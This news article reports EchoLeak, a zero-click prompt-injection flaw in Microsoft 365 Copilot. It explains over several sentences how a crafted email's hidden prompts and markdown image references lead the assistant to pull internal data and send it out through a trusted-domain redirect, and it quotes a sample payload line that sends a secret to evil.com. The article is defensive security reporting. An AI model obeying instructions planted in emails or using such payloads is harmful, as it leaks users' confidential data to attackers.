Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.
Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.
One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.
“This is sheer weaponization of AI’s core strength, contextual understanding, against itself,” said Abhishek Anant Garg, an analyst at QKS Group. “Enterprise security struggles because it’s built for malicious code, not language that looks harmless but acts like a weapon.”
This kind of vulnerability represents a significant threat, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based services, it’s definitely not the last we’ll see.”
EchoLeak’s exploit mechanism
EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.
The exploit chain hinges on three vulnerabilities, including an open redirect in Microsoft’s Content Security Policy (CSP), which trusts domains like Teams and SharePoint. This lets attackers disguise malicious requests as legitimate, bypassing Microsoft’s defenses against Cross-Prompt Injection Attacks (XPIA).
“EchoLeak exposes the false security of phased AI rollouts,” Garg noted. Aim Security classifies this flaw as an “LLM Scope Violation,” where untrusted prompts manipulate AI into accessing data outside its intended scope. “Attackers can reference content from other parts of the LLM context to extract sensitive information, turning the AI’s ability to synthesize into a data exfiltration vector,” Garg said.
Researchers also found other similar weaknesses, hinting that other AI systems using the same technology could be at risk. Microsoft said it fixed the vulnerability, confirming no customers were affected and no actual attacks happened.
Echoes beyond Microsoft
“EchoLeak marks a shift to assumption-of-compromise architectures,” Garg stated. “Enterprises must now assume adversarial prompt injection will occur, making real-time behavioral monitoring and agent-specific threat modeling existential requirements.”
As AI becomes a workplace staple, analysts urge robust input validation and data isolation. Henein warned that targeted attacks like “sending an email to a CFO to steal earnings data before disclosure” are especially concerning.
Any AI system built on Retrieval-Augmented Generation (RAG) could be at risk if it processes external inputs alongside sensitive internal data. Traditional defenses like DLP tags often fail to prevent such attacks and may impair Copilot’s functionality when enabled, Garg explained, “The vulnerability proves that traditional perimeters are meaningless when AI can be manipulated to violate boundaries through seemingly innocent inputs.”
For sectors like banking, healthcare, and defense, these productivity tools can double as powerful exfiltration mechanisms. “CIOs must now design AI systems assuming adversarial autonomy,” said Garg. “Every agent is a potential data leak and must undergo red-team validation before production.”
Rethinking AI security
EchoLeak shows that enterprise-grade AI isn’t immune to silent compromise, and securing it isn’t just about patching layers. “AI agents demand a new protection paradigm,” Garg said. “Runtime security must be the minimum viable standard.”
The flaw also reveals deeper structural issues in modern AI. “Agentic AI suffers from context collapse,” Garg explained. “It blends data across security domains and can’t distinguish between what it can access and what it should, turning synthesis into privilege escalation.”
As AI’s attack surface expands, EchoLeak proves even the most sophisticated systems can be weaponized by exploiting the AI’s own logic. “For now,” Garg concluded, “CISOs should trust, but verify, and think twice before letting AI read your inbox.”
More Microsoft security news:
- Microsoft launches European Security Program to counter nation-state threats
- Microsoft takes first step toward passwordless future
- Microsoft pushes a lot of products on users, but here’s one cybersecurity can embrace
>
The original article found on CSO Awards 2025 showcase world-class security strategies | CSO Online Read More